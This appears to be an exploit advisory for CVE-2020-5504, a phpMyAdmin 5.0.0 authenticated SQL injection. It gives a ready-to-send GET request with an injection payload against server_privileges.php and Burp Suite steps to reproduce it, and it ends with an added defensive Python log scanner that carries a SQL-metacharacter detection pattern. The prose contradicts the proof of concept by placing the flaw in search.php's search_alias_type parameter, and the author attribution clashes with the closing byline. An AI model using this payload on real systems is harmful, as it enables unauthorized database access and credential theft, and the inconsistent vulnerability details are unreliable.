phpMyAdmin 5.0.0 was vulnerable to an authenticated SQL Injection (CVE-2020-5504).
The vulnerability resided in the `search.php` component, specifically within the `search_alias_type` parameter. An authenticated attacker, even with low privileges, could exploit this flaw. Improper sanitization of user-supplied input allowed attackers to inject malicious SQL queries.
This enabled attackers to extract sensitive database information, including user credentials, manipulate database content, and potentially achieve remote code execution (RCE) by writing arbitrary files to the server, depending on server configuration and permissions.
The vulnerability was patched in phpMyAdmin version 5.0.1. Users were strongly advised to upgrade immediately.
# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/
# Software Link: https://github.com/phpmyadmin/phpmyadmin/
# Version: 5.0.0
# Tested on: Windows
# CVE : CVE-2020-5504
Proof Of Concept
GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close
# Additional conditions:
# - The attacker must have a valid MySQL account to access the server.
Steps to Reproduce
Log in to phpMyAdmin.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensuring it includes a valid session cookie.
Observe the result.
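For defenders, a log check for the request shown in the proof of concept. This is an added example, not part of the original advisory: it scans web access logs for `validate_username` calls to `server_privileges.php` whose decoded `username` value carries SQL metacharacters. The log lines, the function name and the metacharacter list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Nov/2025:10:00:01 +0000] "GET /server_privileges.php?'
    'ajax_request=true&validate_username=set&username='
    '%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1" 200 512',
    '10.0.0.7 - - [25/Nov/2025:10:00:09 +0000] "GET /pma/server_privileges.php?'
    'ajax_request=true&validate_username=set&username=report_user HTTP/1.1" 200 48',
    '10.0.0.9 - - [25/Nov/2025:10:01:30 +0000] "GET /index.php HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Assumed indicator set: quotes, backslash, statement separator and
# MySQL comment openers have no place in a username lookup.
SQL_META_RE = re.compile(r"""['"\\;#]|--|/\*""")


def flag_username_checks(log_lines):
    """Return (client_ip, decoded_username) for suspicious validate_username calls."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        # Match the endpoint regardless of the install prefix (/, /pma/, ...).
        if not url.path.lower().endswith("/server_privileges.php"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space.
        params = parse_qs(url.query, keep_blank_values=True)
        if "validate_username" not in params:
            continue
        for value in params.get("username", []):
            if SQL_META_RE.search(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, username in flag_username_checks(SAMPLE_LOG):
        print(f"{ip} sent username={username!r} to the username check")
```

Access logs record only the query string, so this covers the GET form of the request shown above; parameters sent in a request body would need proxy or WAF logs instead.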
- Written by: khalil shreateh